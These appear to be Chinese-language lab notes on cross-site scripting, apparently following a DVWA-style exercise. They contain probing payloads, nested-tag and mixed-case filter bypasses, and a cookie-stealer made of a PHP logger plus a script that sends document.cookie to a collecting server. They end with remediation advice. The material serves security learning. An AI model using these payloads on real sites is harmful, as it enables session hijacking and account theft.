1、XSS:跨站脚本攻击。cross-site scripting。本质:客户端代码注入漏洞,通常注入代码是js脚本。
存储型XSS
反射性xss
DOM型xss
手工检测XSS思路:
已知输出位置(1)输入敏感字符<>"'()&,看有没有转义
未知输出未知(1)"/><script>alert(1)</script>
如果显示区域不在html属性内使用模糊测试方案:
(1)<script>alert(document.cookie)</script> 普通注入
(2)"/><script>alert(document.cookie)</script> 闭合标签注入
2、(1)输入<xss>,元素中发现<xss>标签,实现注入
(2)弹窗测试<script>alert(/xxs/)</script>,成功注入js脚本;
js弹窗函数:(1)alert() (2)confirm() (3)prompt()
3、攻击者
(1)攻击者web设计 构造cookie.php <?php $cookie = $_GET['cookie'];file_put_contents('cookie.txt',$cookie);?>
(2)构造攻击js 传递cookies到服务器的js字符串使用了document.cookie参数,但是我们用的是document.location中定义的url。
|
<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
(3)构造并发送攻击url 需要对参数进行url编码
(4)获取cookie
(5)劫持会话
JS写XSS cookie stealer来窃取密码的步骤详解
4、medium等级:源码
(1)弹窗测试<script>alert(/xxs/)</script>,发现服务端过滤了 script标签。通常只过滤一次,如何绕过:
技巧1:嵌套<scri<script>pt>alert(1)</script>,成功弹窗;
技巧2:大小写混合<Script>alert(/xxs/)</scripT>,成功绕过;
5、high等级:源码$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
8、xss漏洞的修复:
字符转义
imopossible:$name = htmlspecialchars( $_GET[ 'name' ] );
(1)用户的输入:不建议设置黑名单,设置白名单(限制规范),这样的控制在服务端做。存储型xss的长度绕过就是数据没有在服务端限制。
(2)xss的修复最重要的是服务端的输出过滤:
如果是输出到html中,进行html编码
如果是输出到js中,进行js转义
存储型xss:与反射型xss的利用代码一样。
1、存储型xss长度限制的绕过:就是数据没有在服务端限制(输入数据长度最大的限制,即maxlength=xx。由于其只是建立在前端浏览器的检测而已,所以可以通过客户端的开发者工具(按F12)或者通过burpsuite将maxlength的值改大或者直接删去便可)